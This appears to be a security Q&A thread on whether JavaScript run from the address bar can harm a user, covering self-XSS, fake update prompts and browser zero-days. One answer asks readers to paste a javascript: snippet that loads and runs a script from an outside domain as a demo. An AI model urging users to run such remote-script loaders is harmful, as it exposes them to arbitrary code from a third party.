Can javascript execution from address bar cause any harm to client's machine?
That JavaScript executed from the address bar will run in the context of the website displayed in that tab. This means complete access to that website and it could change how the website looks and behaves from the point of view of the user.
This attack is called self XSS and can cause harm to the user and indirectly to the machine. A reputable website can ask the user to download and install a malicious piece of executable code by pretending, for example, that it needs a Flash update.
To get a nice visual example of this, manually type javascript: in your address bar and then paste this:
z=document.createElement("script");z.src="https://peniscorp.com/topkek.js"; document.body.appendChild(z); If you don't trust me, do it in the address bar of a website you are not logged in.
Most browsers have realised this vulnerability and attempt to limit the impact by cutting out javascript: when pasting javascript:some_js_code in the address bar. But it is still possible to manually write it and execute it.
I would like to complete the Accepted Answer from Cristian Dobre, which is correct but incomplete.
Executing javascript (whether it is via an address bar or via more classic means does not matter here) can, in some cases, lead to Remote Code Execution by exploiting buffer overflows (or similar flaws) in browsers. This is one of the reasons why patching browsers regularly is pretty important.
Such occurrences are rarely discovered in the wild but exist, and new ones are discovered every year (Chrome had less than Firefox which has WAY LESS than IE, in the past).
A good example here on SO : https://stackoverflow.com/questions/381171/help-me-understand-this-javascript-exploit
So, to answer your question : yes, it can harm a client's machine. If the machine is fully patched, only a zero-day (extremely unlikely yet still technically possible) could do such harm. Zero-days with such power are mostly, "luckily", used for targeted attacks to avoid attention and maximize the chances of non-detection (and, thus, future reuse).